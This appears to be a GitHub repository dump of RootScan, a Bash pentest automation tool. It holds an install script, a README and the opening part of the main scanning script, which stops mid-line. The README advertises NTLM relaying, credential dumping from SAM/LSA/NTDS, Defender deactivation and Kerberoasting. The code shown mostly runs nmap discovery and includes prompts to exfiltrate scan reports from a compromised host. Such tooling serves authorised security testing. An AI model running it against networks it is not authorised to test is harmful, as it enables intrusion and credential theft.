├── assets ├── nmap_html.png └── elymaro.lab.png ├── LICENSE ├── install.sh ├── README.md └── rootscan.sh /assets/nmap_html.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elymaro/rootscan/HEAD/assets/nmap_html.png -------------------------------------------------------------------------------- /assets/elymaro.lab.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elymaro/rootscan/HEAD/assets/elymaro.lab.png -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Elymaro 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | apt update 4 | 5 | if ! which ipcalc >/dev/null 2>&1; then 6 | apt install ipcalc -y 7 | fi 8 | 9 | if ! which netexec >/dev/null 2>&1; then 10 | apt install pipx git 11 | pipx ensurepath 12 | pipx install git+https://github.com/Pennyw0rth/NetExec 13 | fi 14 | 15 | if ! which xfreerdp3 >/dev/null 2>&1; then 16 | apt install freerdp3 -y 17 | fi 18 | 19 | if ! which bloodhound-ce-python >/dev/null 2>&1; then 20 | apt install bloodhound-ce-python -y 21 | fi 22 | 23 | if ! which pret >/dev/null 2>&1; then 24 | git clone https://github.com/RUB-NDS/PRET.git 25 | sed -i '1s|^#!/usr/bin/env python$|#!/usr/bin/env python2|' PRET/pret.py 26 | mv /usr/bin/PRET /opt/pret 27 | ln -s /opt/pret/pret.py /usr/local/bin/pret 28 | chmod +x /usr/local/bin/pret 29 | curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py 30 | python2 get-pip.py 31 | rm get-pip.py 32 | python2 -m pip install pysnmp 33 | fi 34 | 35 | if ! which manspider >/dev/null 2>&1; then 36 | apt install python3-venv -y 37 | pip install pipx 38 | pipx install git+https://github.com/blacklanternsecurity/MANSPIDER --force 39 | pipx ensurepath 40 | # for images (png, jpeg) 41 | apt install tesseract-ocr -y 42 | # for legacy document support (.doc) 43 | apt install antiword -y 44 | cp ~/.local/share/pipx/venvs/man-spider/bin/manspider /usr/bin/ 45 | fi 46 | 47 | if ! which xsltproc >/dev/null 2>&1; then 48 | apt install xsltproc -y 49 | fi 50 | 51 | if ! which kerbrute >/dev/null 2>&1; then 52 | if ! dpkg -l | grep -q "^ii golang-go "; then 53 | apt install golang-go -y 54 | fi 55 | git clone https://github.com/ropnop/kerbrute 56 | cd kerbrute 57 | make linux 58 | cd dist 59 | cp kerbrute_linux_amd64 /usr/sbin/kerbrute 60 | cd ../.. 61 | rm -rf kerbrute 62 | fi 63 | 64 | if [ ! -f "/usr/share/nmap/nmap-services.bkp" ]; then 65 | cp /usr/share/nmap/nmap-services /usr/share/nmap/nmap-services.bkp 66 | fi 67 | # Make update top-ports 1000 to include winrm service 68 | curl https://raw.githubusercontent.com/nmap/nmap/refs/heads/master/nmap-services -o /usr/share/nmap/nmap-services 69 | 70 | if ! which proxychains >/dev/null 2>&1; then 71 | apt install proxychains4 -y 72 | fi 73 | 74 | if ! which ldapsearch >/dev/null 2>&1; then 75 | apt install ldap-utils -y 76 | fi 77 | 78 | if ! which snmpwalk >/dev/null 2>&1; then 79 | apt install snmp-mibs-downloader -y 80 | fi 81 | #Installation MIB SNMP : 82 | if ! which snmpwalk >/dev/null 2>&1; then 83 | apt install download-mibs -y 84 | sed -i '/^mibs :/ s/^/# /' /etc/snmp/snmp.conf 85 | fi 86 | 87 | if ! which onesixtyone >/dev/null 2>&1; then 88 | apt install onesixtyone -y 89 | fi 90 | 91 | if ! which seclists >/dev/null 2>&1; then 92 | apt install seclists -y 93 | fi 94 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RootScan 2 | 3 | The aim of this script is to help and speed up the recognition phase in pentesting, although it is still necessary to carry out a more in-depth search manually. 4 | 5 | Key features: 6 | 7 | - **HTML report**: Scans ports and generates nmap reports in HTML format for easy reading. 8 | - **Port filtering**: IPs with similar port opened are automatically recorded in a a same file (161.txt, 88.txt..). 9 | - **Attack automation**: If machines are vulnerable, the tool automatically launches the Responder and NTLMRelayx. 10 | - **Integrated Manspider**: Runs Manspider on machines with port 445 open to search for sensitive keywords (only available in NTLM mode). 11 | - **Proxychains support**: Option to use proxychains available at start-up. 12 | - **Kerberos support** : Automated support for NTLM and Kerberos 13 | 14 | ![image](https://github.com/Elymaro/rootscan/blob/main/assets/elymaro.lab.png) 15 | 16 | Some elements can be modified on the targets (only in the SMB function). If this is the case, orange information will be displayed and the recovery commands will be written to a modifs.txt file. The -r option will be used to execute all of them in order to clean up the actions performed. 17 | 18 | ### Installation 19 | ``` 20 | git clone https://github.com/Elymaro/rootscan.git 21 | cd rootscan ; chmod +x rootscan.sh 22 | ``` 23 | ### Installation dependencies 24 | ``` 25 | chmod +x install.sh && ./install.sh 26 | ``` 27 | 28 | ### Usage : 29 | 30 | For the first start of a projet, you must use option **-f** or at least **-s nmap_fast** 31 | 32 | Full enumeration with "b.robinson" acount on the 192.168.1.0/26 network 33 | ``` 34 | ./rootscan.sh -o LAB001 -i eth0 -t 192.168.1.0/26 -u "b.robinson" -p "Kebxj6urt0o" -f 35 | ``` 36 | Enumeration with "b.robinson" account and his NT Hash. Script will try to enumerate on functions : "nmap_fast" and "smb" 37 | ``` 38 | ./rootscan.sh -o LAB001 -i eth0 -t 192.168.1.17/32 -u "b.robinson" -H "08CFA7DDB10EB084FAC1CB72152B1E95" -s nmap_fast,smb 39 | ``` 40 | Full enumeration with "anonymous:anonymous" login expect on function "snmp" and "ldap" 41 | ``` 42 | ./rootscan.sh -o LAB001 -i eth0 -t 192.168.1.17/32 -e snmp,ldap 43 | ``` 44 | 45 | Depending on the functions chosen, the script will attempt to dig down and retrieve as much data as possible. 46 | For example SMB: 47 | - Automatic NTLM / Kerberos support 48 | - Attempt to connect in anonymous mode 49 | - Connection attempt in guest mode 50 | - Attempt to connect using the credentials provided 51 | - Users extraction 52 | - Shares discovery 53 | - Exploitation of LSA / SAM / RDP activation / Defender deactivation / impersonate 54 | - ... 55 | 56 | The script will also attempt to recover the most popular exploits/misconfigurations such as : 57 | - ms17-010 58 | - zerologon 59 | - petitpotam 60 | - nopac 61 | - spooler 62 | - install_elevated 63 | - gpp_password 64 | - gpp_autologin 65 | - ... 66 | 67 | ### Options 68 | ``` 69 | Usage: ./rootscan.sh -o ProjectName -i Interface -t rangeIP [-u Username [-p Password | -n NT_Hash]] [-f | -e nmap_fast | -s smb,vnc] [-m [basic | no-ping]] 70 | 71 | Options: 72 | -o Project name (output directory) 73 | -i Network interface 74 | -t IP range (e.g., 192.168.0.0/24,192.168.1.128/27). /32 must be used for individual IP addresses. 75 | -u Username (optional) 76 | -p Password (optional, either Password or NT_Hash must be provided, can be empty) 77 | -H NTLM Hash (optional, either Password or NT_Hash must be provided, can be empty) 78 | -f Execute all functions 79 | -e Execute all functions except specified ones (-e rdp,winrm) 80 | -s Execute only specified functions (-s rdp,winrm) 81 | -m Discovery mode (default: basic). basic = ARP + ping (faster, may miss hosts); no-ping = skip ping (slower, more accurate) 82 | -M Modifications or alerts on target systems may be performed (e.g., SAM / LSA / LSASS / DPAPI / NTDS extraction, RDP enabling) 83 | -r Restore modifications made to targets 84 | -h Display help 85 | 86 | Available functions: 87 | - nmap_fast : Scan open ports and service versions (need to be done at least 1 time at the begin of a project) 88 | - relay : Launch Responder and NTLMRelayx 89 | - manspider : Search for sensitive data (passwords, usernames...) on SMB shares 90 | - vulns : Check for ms17-010, NoPac, Zerologon, MSOL creds, GPP_autologin, GPP_password, ... 91 | - ftp : Enumerate FTP services 92 | - ssh : Enumerate SSH services 93 | - winrm : Enumerate WinRM services 94 | - rdp : Enumerate WinRM services 95 | - smtp : Enumerate SMTP services 96 | - nfs : Enumerate NFS shares 97 | - vnc : Enumerate VNC services 98 | - zt : Attempt DNS zone transfers 99 | - printers : Identify reachable printers 100 | - snmp : Search for public SNMP communities 101 | - ldap : Anonymous LDAP enumeration 102 | - ipmi : IPMI service enumeration 103 | - mssql : Attempt MSSQL authentication 104 | - smb : Check anonymous/guest access, shares, users, LSA, DPAPI, ... 105 | - bloodhound : Collect data for BloodHound Community Edition (equivalent to SharpHound/Ingestor) 106 | - users : Enumerate Active Directory users (Get-ADUsers) 107 | - asp : Attempt AS-REP Roasting attack 108 | - krb : Attempt Kerberoasting attack 109 | - web : Identify web services 110 | - nmap_full : Deep Nmap scan 111 | ``` 112 | 113 | ### Exemple HTML report 114 | 115 | ![image](https://github.com/Elymaro/rootscan/blob/main/assets/nmap_html.png) 116 | 117 | ## Contributors 118 | 119 | - [O.B. E](https://www.linkedin.com/in/omar-badis-elaffifi/) 120 | - [SAFEIT CONSULTING](https://www.linkedin.com/company/safeit-consulting/) 121 | 122 | ## Tools 123 | 124 | - [fortra](https://github.com/fortra) - impacket 125 | - [Pennyw0rth](https://github.com/Pennyw0rth) NetExec 126 | - [ropnop](https://github.com/ropnop) - Kerbrute 127 | - [blacklanternsecurity](https://github.com/blacklanternsecurity/MANSPIDER) - Manspider 128 | -------------------------------------------------------------------------------- /rootscan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ################################################################# 4 | ##### Developped by Aurélien BOURDOIS ##### 5 | ##### https://www.linkedin.com/in/aurelien-bourdois/ ##### 6 | ################################################################# 7 | 8 | # #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 9 | # ################### FUNCTION CALLS ######################### 10 | # #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 11 | starter() { 12 | 13 | #to avoid error from netexec, put a random name on ${Username} variable 14 | if [ -z "${Username}" ]; then 15 | Username="anonymous" 16 | fi 17 | 18 | if [ -z "${Password}" ] && [ -z "$NT_Hash" ]; then 19 | Password="anonymous" 20 | fi 21 | 22 | while true; do 23 | read -p "Use proxychains ? : (yY/nN) " proxychains 24 | if [[ "${proxychains}" = "y" || "${proxychains}" = "Y" ]]; then 25 | proxychains="proxychains -q" 26 | break 27 | elif [[ "${proxychains}" = "n" || "${proxychains}" = "N" ]]; then 28 | proxychains="" 29 | break 30 | else 31 | echo "Error: unknown option" 32 | fi 33 | done 34 | 35 | if [ -n "${Password}" ]; then 36 | cme_creds="-p ${Password}" 37 | else 38 | cme_creds="-H ${NT_Hash}" 39 | fi 40 | 41 | # Paths 42 | ROOT_PATH="$(pwd)/${ProjectName}" 43 | date_log=$(date +"%Y_%m_%d_%Hh_%Mm") 44 | logfile=${ROOT_PATH}/log_${Username}_${date_log}.log 45 | net=$(python3 -c "print('$rangeIP'.split('/')[0])") 46 | DIR_PORTS="${ROOT_PATH}/ports" 47 | DIR_VULNS="${ROOT_PATH}/vulns" 48 | hostname_file=$(if [ -e "${ROOT_PATH}/hostname_file.txt" ]; then cat "${ROOT_PATH}/hostname_file.txt"; fi) 49 | 50 | # TimeReference 51 | start=$SECONDS 52 | 53 | mkdir ${ROOT_PATH} 2>/dev/null 54 | excluded_hosts="$(ip -o -4 addr show $INTERFACE | awk '{print $4}' | cut -d'/' -f1)" 55 | RDP_TIMEOUT=7 56 | CME_TIMEOUT=15 #increase in case of slow network 57 | SNMP_TIMEOUT=3 58 | SPACE=' ' 59 | 60 | ################### RENAME TAB ############################## 61 | cat << 'EOF' > /tmp/set_title_tab.sh 62 | #!/bin/bash 63 | 64 | printf '\033]0;%s\007' "$1" 65 | EOF 66 | 67 | chmod +x /tmp/set_title_tab.sh 68 | 69 | ################### VARIABLES ############################## 70 | # Colors 71 | LIGHTRED="\033[1;31m" 72 | LIGHTGREEN="\033[1;32m" 73 | LIGHTORANGE="\033[1;33m" 74 | LIGHTBLUE="\033[1;34m" 75 | RESET="\033[0;00m" 76 | 77 | ## Creation des dossiers 78 | mkdir ${ROOT_PATH}/scan_nmap 2>/dev/null 79 | mkdir ${ROOT_PATH}/scan_nmap 2>/dev/null 80 | mkdir ${ROOT_PATH}/ports 2>/dev/null 81 | mkdir ${ROOT_PATH}/vulns 2>/dev/null 82 | 83 | if [ -e ${ROOT_PATH}/log_${Username}.log ];then 84 | rm ${ROOT_PATH}/log_${Username}.log 85 | fi 86 | banner 87 | pop_logger 88 | } 89 | 90 | ######################## LOG FUNCTIONS ########################## 91 | log () { 92 | #anciennement $(echo $1 | sed 's/\n*//g') 93 | echo -e "$(date +%F-%T) $(echo "$1" | sed ':a;N;$!ba;s/\n\([[:space:]]*\)/\1/g')" >> $logfile 94 | echo -e "$1" 95 | } 96 | red_log (){ 97 | echo -e "$LIGHTRED$1 $RESET" 98 | echo -e "$(date +%F-%T) $LIGHTRED$(echo "$1" | sed ':a;N;$!ba;s/\n\([[:space:]]*\)/\1/g')$RESET" >> $logfile 99 | } 100 | orange_log (){ 101 | echo -e "$LIGHTORANGE$1 $RESET" 102 | echo -e "$(date +%F-%T) $LIGHTORANGE$(echo "$1" | sed ':a;N;$!ba;s/\n\([[:space:]]*\)/\1/g')$RESET" >> $logfile 103 | } 104 | green_log (){ 105 | echo -e "$LIGHTGREEN$1 $RESET" 106 | echo -e "$(date +%F-%T) $LIGHTGREEN$(echo "$1" | sed ':a;N;$!ba;s/\n\([[:space:]]*\)/\1/g')$RESET" >> $logfile 107 | } 108 | blue_log (){ 109 | echo -e "$LIGHTBLUE$1 $RESET" 110 | echo -e "$(date +%F-%T) $LIGHTBLUE$(echo "$1" | sed ':a;N;$!ba;s/\n\([[:space:]]*\)/\1/g')$RESET" >> $logfile 111 | } 112 | 113 | ################### BANNER ############################## 114 | banner () { 115 | log "⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐" 116 | log "Starting $0 on: " 117 | log "IP range : $rangeIP" 118 | log "Username : ${Username}" 119 | if [ -n "$NT_Hash" ]; then 120 | log "NT_Hash : $NT_Hash" 121 | else 122 | log "Password : ${Password}" 123 | fi 124 | log "Excluding: $excluded_hosts" 125 | log "⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐" 126 | } 127 | 128 | ######################## POP UP LOGGER ########################## 129 | pop_logger () { 130 | if which terminator > /dev/null 2>&1;then 131 | #terminator --new-tab -m -e "tail -F /root/test" & 132 | terminator --new-tab -m -e "source /tmp/set_title_tab.sh Enumeration; tail -F $logfile" & 133 | else 134 | #export QT_QPA_PLATFORM=offscreen 135 | #qterminal -e "tail -F $logfile" & 136 | qterminal -e bash -c "source /tmp/set_title_tab.sh Enumeration; tail -F $logfile" & 137 | fi 138 | sleep 1 139 | } 140 | 141 | control_ip_attack() { 142 | #Calculate if the current IP is included within the networks targeted by the audit. 143 | TARGET_IP="${ip}" 144 | rangeIP_array=$(echo "$rangeIP" | tr ',' '\n') 145 | while IFS= read -r rangeIP_array_key; do 146 | if [[ "$rangeIP_array_key" =~ /32$ && "$TARGET_IP" == "${rangeIP_array_key%/32}" ]]; then 147 | return 0 148 | fi 149 | NETWORK_LAN=$(ipcalc -n -b $rangeIP_array_key | grep "Address:" | awk '{print $2}') 150 | NETWORK_LAN_BROADCAST=$(ipcalc -n -b $rangeIP_array_key | grep "Broadcast:" | awk '{print $2}') 151 | # Fonction pour convertir les adresses IP en entiers 152 | ip_to_int() { 153 | local a b c d 154 | IFS=. read -r a b c d <<< "$1" 155 | echo $((a * 256**3 + b * 256**2 + c * 256 + d)) 156 | } 157 | # Convertir les adresses en entiers 158 | network_start=$(ip_to_int "$NETWORK_LAN") 159 | network_end=$(ip_to_int "$NETWORK_LAN_BROADCAST") 160 | target_ip_int=$(ip_to_int "$TARGET_IP") 161 | 162 | # Vérifier si l'IP cible est dans la plage 163 | if [[ $network_start -le $target_ip_int && $network_end -ge $target_ip_int ]]; then 164 | return 0 165 | fi 166 | done <<< "$rangeIP_array" 167 | return 1 168 | } 169 | 170 | ########################### FAST SCAN NMAP ##################################### 171 | nmap_fast () { 172 | 173 | #### CALCUL DES IP #### 174 | MY_IP=$(ip -o -4 addr show $INTERFACE | awk '{print $4}' | cut -d'/' -f1) 175 | MY_IP_WITH_MASK=$(ip -o -4 addr show $INTERFACE | awk '{print $4}' | cut -f1) 176 | # Calculer l'adresse réseau pour arp discovery 177 | NETWORK_LAN=$(ipcalc -n -b $MY_IP_WITH_MASK | grep "Address:" | awk '{print $2}') 178 | NETWORK_LAN_BROADCAST=$(ipcalc -n -b $MY_IP_WITH_MASK | grep "Broadcast:" | awk '{print $2}') 179 | 180 | log "[!] Discovery mode : '$discovery_mode'" 181 | 182 | #If the discovery must be by ping requests : 183 | if [[ $discovery_mode == "arp-ping" ]] && [ -z "${proxychains}" ]; then 184 | rangeIP_array=$(echo "$rangeIP" | tr ',' '\n') 185 | for rangeIP_array_key in $rangeIP_array; do 186 | echo "Starting scan : $rangeIP_array_key" 187 | if echo $rangeIP_array_key | grep -vq "/32"; then 188 | TARGET_LAN=$(ipcalc -n -b $rangeIP_array_key | grep "Network:" | awk '{print $2}') 189 | TARGET_LAN_BROADCAST=$(ipcalc -n -b $rangeIP_array_key | grep "Broadcast:" | awk '{print $2}') 190 | else 191 | TARGET_LAN=$(ipcalc -n -b $rangeIP_array_key | grep "Address:" | awk '{print $2}') 192 | TARGET_LAN_BROADCAST=$TARGET_LAN 193 | fi 194 | # Convert IP addresses to integers for comparison 195 | ip_to_int() { 196 | local a b c d 197 | IFS=. read -r a b c d <<< "$1" 198 | echo $((a * 256**3 + b * 256**2 + c * 256 + d)) 199 | } 200 | network_start=$(ip_to_int "$NETWORK_LAN") 201 | network_end=$(ip_to_int "$NETWORK_LAN_BROADCAST") 202 | target_start=$(ip_to_int "$TARGET_LAN") 203 | target_end=$(ip_to_int "$TARGET_LAN_BROADCAST") 204 | 205 | #If attack range is into the selected network interface 206 | if [[ $network_start -le $target_start && $network_end -ge $target_end ]]; then 207 | #ARP Scan 208 | #S'assurer que les excluded hosts ne sont pas inclu dans hosts.txt 209 | nmap -PR -sn $rangeIP_array_key | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | grep -v $MY_IP > ${ROOT_PATH}/tmp_hosts.txt 2>&1 210 | grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' ${ROOT_PATH}/tmp_hosts.txt >> ${ROOT_PATH}/hosts.txt 211 | rm ${ROOT_PATH}/tmp_hosts.txt 212 | else 213 | fping -g $rangeIP_array_key --alive -q | grep -v $MY_IP >> ${ROOT_PATH}/hosts.txt 2>/dev/null 214 | sort -u ${ROOT_PATH}/hosts.txt -o ${ROOT_PATH}/hosts.txt 215 | fi 216 | done 217 | NMAP_HOSTS="-Pn -iL ${ROOT_PATH}/hosts.txt" 218 | log "${SPACE}[!] $(wc -l < "${ROOT_PATH}/hosts.txt") hosts detected via arp / ping" 219 | elif [ -z "${proxychains}" ]; then 220 | NMAP_HOSTS="-Pn $(echo "$rangeIP" | tr ',' ' ')" 221 | fi 222 | 223 | log "[🔍] Scanning NMAP - Fast version" 224 | #Fast NMAP TCP 225 | if [ -n "${proxychains}" ]; then 226 | #Proxychains ne comprenant pas les requetes personnalisés, nous lui indiqueront de faire des requetes full (sT) 227 | #${proxychains} nmap -sT -Pn ${NMAP_HOSTS} -R -oA ${ROOT_PATH}/scan_nmap/scan_Fast_TCP --top 1000 --open --exclude $excluded_hosts >/dev/null 2>&1 228 | blue_log "Import 'nmap binaries' on the victim to do a nmap from the linux target (too slow through proxychains)" 229 | blue_log "nmap -sV -Pn -T4 --open -oA scan_Fast_TCP $rangeIP" 230 | blue_log "nmap -Pn -sU --open --top 25 -oA scan_Full_UDP $rangeIP" 231 | blue_log "Then exfiltrate nmap reports to '${ROOT_PATH}/scan_nmap/' on the attacker's machine" 232 | blue_log "Then mount the proxychains" 233 | log "Press Entrer when ready ..." 234 | read 235 | else 236 | log "${SPACE}[📂] TCP Scanning ..." 237 | #Si pas proxychains, sS pour TCP 238 | #ports=$(nmap -p- --min-rate=1000 -T4 $target | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo "nmap -p $ports -sT -sV -T4 -R $target"; nmap -p $ports -sT -sV -T4 -R $target 239 | nmap ${NMAP_HOSTS} -sT -T4 -oA ${ROOT_PATH}/scan_nmap/scan_TCP_ports --open --exclude $excluded_hosts >/dev/null 2>&1 240 | 241 | ports=$(grep -oP '^\d{1,5}/(tcp|udp)' ${ROOT_PATH}/scan_nmap/scan_TCP_ports.nmap | awk -F'/' '{print $1}' | sort -u | paste -sd, -) 242 | nmap ${NMAP_HOSTS} -sT -sV -T4 -p $ports -oA ${ROOT_PATH}/scan_nmap/scan_Fast_TCP --open --exclude $excluded_hosts >/dev/null 2>&1 243 | #log "${SPACE}[!] Nmap TCP report : ${ROOT_PATH}/scan_nmap/scan_Fast_TCP.nmap" 244 | log "${SPACE}[📂] UDP Scanning ..." 245 | #UDP 246 | UDP_PORTS=$(nmap -Pn -sU ${NMAP_HOSTS} -R --open --top 25 -T4 --exclude $excluded_hosts | grep -v filtered | grep -oP '^\d+(?=/udp)' | paste -sd',' -) 247 | nmap -Pn -sU ${NMAP_HOSTS} -R -oA ${ROOT_PATH}/scan_nmap/scan_Full_UDP -p $UDP_PORTS --open -T4 --exclude $excluded_hosts >/dev/null 2>&1 248 | fi 249 | 250 | #log "${SPACE}[!] Nmap UDP report : ${ROOT_PATH}/scan_nmap/scan_Full_UDP.nmap" 251 | 252 | #Convert to html 253 | #TCP 254 | sed -i 's/href="nmap\.xsl/href="file:\/\/\/usr\/bin\/\.\.\/share\/nmap\/nmap\.xsl/g' ${ROOT_PATH}/scan_nmap/scan_Fast_TCP.xml 255 | xsltproc ${ROOT_PATH}/scan_nmap/scan_Fast_TCP.xml -o ${ROOT_PATH}/scan_Fast_TCP.html 256 | log "${SPACE}[!] Nmap TCP report in HTML format : ${ROOT_PATH}/scan_Fast_TCP.html" 257 | 258 | #UDP 259 | cat ${ROOT_PATH}/scan_nmap/scan_Full_UDP.nmap | grep -v "open|filtered" > ${ROOT_PATH}/scan_nmap/scan_Full_UDP_open.nmap 260 | sed -i 's/href="nmap\.xsl/href="file:\/\/\/usr\/bin\/\.\.\/share\/nmap\/nmap\.xsl/g' ${ROOT_PATH}/scan_nmap/scan_Full_UDP.xml 261 | #Delete ip block without explicit opened port (for better lisibility in html) 262 | awk ' 263 | // { 270 | block = block $0 271 | if (has_open) { 272 | print block 273 | } 274 | in_block = 0 275 | next 276 | } 277 | / "${ROOT_PATH}/scan_nmap/scan_Full_UDP_filtered.xml" 288 | xsltproc ${ROOT_PATH}/scan_nmap/scan_Full_UDP_filtered.xml -o ${ROOT_PATH}/scan_Full_UDP.html 289 | #Suppression des filtered|opened 290 | awk 'BEGIN { RS="" } /open\|filtered/ { next } { printf "%s", $0 "" }' ${ROOT_PATH}/scan_Full_UDP.html > ${ROOT_PATH}/scan_Full_UDP_open.html 291 | log "${SPACE}[!] Nmap UDP report in HTML format : ${ROOT_PATH}/scan_Full_UDP_open.html" 292 | 293 | #Extracting IP from the 2 reports 294 | grep -i 'Nmap scan report for' "${ROOT_PATH}/scan_nmap/scan_Fast_TCP.nmap" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' >> ${ROOT_PATH}/hosts.txt 295 | grep -i 'Nmap scan report for' "${ROOT_PATH}/scan_nmap/scan_Full_UDP.nmap" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' >> ${ROOT_PATH}/hosts.txt 296 | 297 | #Compilation TCP + UDP report 298 | cat ${ROOT_PATH}/scan_nmap/scan_Full_UDP_open.nmap ${ROOT_PATH}/scan_nmap/scan_Fast_TCP.nmap > ${ROOT_PATH}/scan_nmap/scan_Full_Fast.nmap 299 | 300 | sort -u ${ROOT_PATH}/hosts.txt -o ${ROOT_PATH}/hosts.txt 301 | 302 | log "${SPACE}[!] NMAP scan detected $(wc -l "${ROOT_PATH}/hosts.txt" | awk '{print $1}') machines" 303 | 304 | #resolution_ip=$(cat ${ROOT_PATH}/hosts.txt) 305 | #for ip in $resolution_ip; do 306 | # tmp_resolution=$(${proxychains} timeout 3 netexec smb ${ip} < /dev/null 2>/dev/null) 307 | # echo "$tmp_resolution" | awk '{print $2 ":" $4}' >> ${ROOT_PATH}/hostname_file.txt 308 | #done 309 | 310 | ##Tri par ports : 311 | log "${SPACE}[!] Sorting by opened ports ..." 312 | fichier_nmap="${ROOT_PATH}/scan_nmap/scan_Full_Fast.nmap" 313 | 314 | # Parcourir le fichier Nmap 315 | #Initiliser le fichier ${ROOT_PATH}/hostname_file.txt 316 | if [ -e ${ROOT_PATH}/hostname_file.txt ];then 317 | rm ${ROOT_PATH}/hostname_file.txt 318 | touch ${ROOT_PATH}/hostname_file.txt 319 | fi 320 | 321 | while IFS= read -r ligne; do 322 | if [[ $ligne == "Nmap scan report for"* ]]; then 323 | # Extraire l'adresse IP 324 | ip=$(echo "$ligne" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}') 325 | resolve="0" 326 | domain_nmap='' 327 | host_nmap='' 328 | elif [[ $ligne =~ ^([0-9]+)/tcp ]] || [[ $ligne =~ ^([0-9]+)/udp ]]; then 329 | # Extraire le numéro de port et le nom du protocole 330 | port="${BASH_REMATCH[1]}" 331 | protocole="${BASH_REMATCH[2]}" 332 | # Ajouter l'IP à son fichier correspondant 333 | echo "${ip}" >> "${DIR_PORTS}/${port}.txt" 334 | #Si le script est executé plusieurs fois, supprimera les doublons 335 | sort -u ${DIR_PORTS}/${port}.txt -o ${DIR_PORTS}/${port}.txt 336 | fi 337 | done < "$fichier_nmap" 338 | 339 | log "${SPACE}[!] Name Resolution machines ... " 340 | resolve="0" 341 | while IFS= read -r ligne; do 342 | #Extraction de la résolution DNS des machines (si elle n'est pas résolue) 343 | if [[ $ligne == "Nmap scan report for"* ]]; then 344 | resolve="0" 345 | ip=$(echo "$ligne" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}') 346 | fi 347 | if [[ "$resolve" == "0" ]]; then 348 | regex_Domain='Domain: ([A-Za-z0-9.-]+[^A-Za-z]*)' 349 | regex_Host='Service Info: Host: ([^;]+)' 350 | FQDN=$(echo "$ligne" | grep 'Nmap scan report for' | awk '{if ($5 ~ /[a-zA-Z]/) print $5}') 351 | regex_FQDN='FQDN: ([A-Za-z0-9.-]+)' 352 | regex_RDP_info_DNS='DNS_Computer_Name: ([A-Za-z0-9.-]+)' 353 | if [[ $ligne =~ $regex_Host ]];then 354 | host_nmap="${BASH_REMATCH[1]}" 355 | fi 356 | if [ -n "$FQDN" ] && [[ ! "$FQDN" =~ \.lan$ ]] && [[ "$FQDN" =~ ^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+$ ]]; then 357 | echo "${ip}:${FQDN}" >> ${ROOT_PATH}/hostname_file.txt 358 | resolve="1" 359 | elif [[ $ligne == "Nmap scan report for"* ]];then 360 | netexec_port="" 361 | if grep -qs ${ip} "${DIR_PORTS}/445.txt";then 362 | netexec_port="smb" 363 | elif grep -qs ${ip} "${DIR_PORTS}/3389.txt";then 364 | netexec_port="rdp" 365 | elif grep -qs ${ip} "${DIR_PORTS}/5985.txt";then 366 | netexec_port="winrm" 367 | fi 368 | if [ -n "$netexec_port" ]; then 369 | ${proxychains} netexec ${netexec_port} ${ip} < /dev/null > ${ROOT_PATH}/tmp_resolve.txt 2>/dev/null 370 | if [[ $(cat ${ROOT_PATH}/tmp_resolve.txt | grep -oP 'name:\K[^)]+') ]] && ([[ $(cat ${ROOT_PATH}/tmp_resolve.txt | grep -oP 'domain:\K[^)]+') ]] || [[ $(cat ${ROOT_PATH}/tmp_resolve.txt | grep -oP 'workgroup:\K[^)]+') ]]); then 371 | # Extraire le nom, le domaine ou le workgroup à partir de la sortie 372 | name=$(cat ${ROOT_PATH}/tmp_resolve.txt | grep -oP 'name:\K[^)]+') 373 | domain_workgroup=$(cat ${ROOT_PATH}/tmp_resolve.txt | grep -oP '(domain|workgroup):\K[^)]+') 374 | ip_regex='^([0-9]{1,3}\.){3}[0-9]{1,3}$' 375 | #Confirm that name or domain_workgroup are not ip_address 376 | if [[ ! "$name" =~ ${ip}_regex ]]; then 377 | echo "${ip}:${name}.${domain_workgroup}" >> ${ROOT_PATH}/hostname_file.txt 378 | resolve="1" 379 | fi 380 | fi 381 | fi 382 | elif [[ $ligne =~ $regex_Domain ]];then 383 | #Delete potential non alphabetic caracters at the end (ex: ctf.lab0.) 384 | domain_nmap="${BASH_REMATCH[1]}" 385 | cleaned_domain=$(echo "$domain_nmap" | sed 's/[^a-zA-Z]*$//') 386 | if [[ -n "$host_nmap" ]] && [[ -n "$cleaned_domain" ]];then 387 | #If $host_nmap 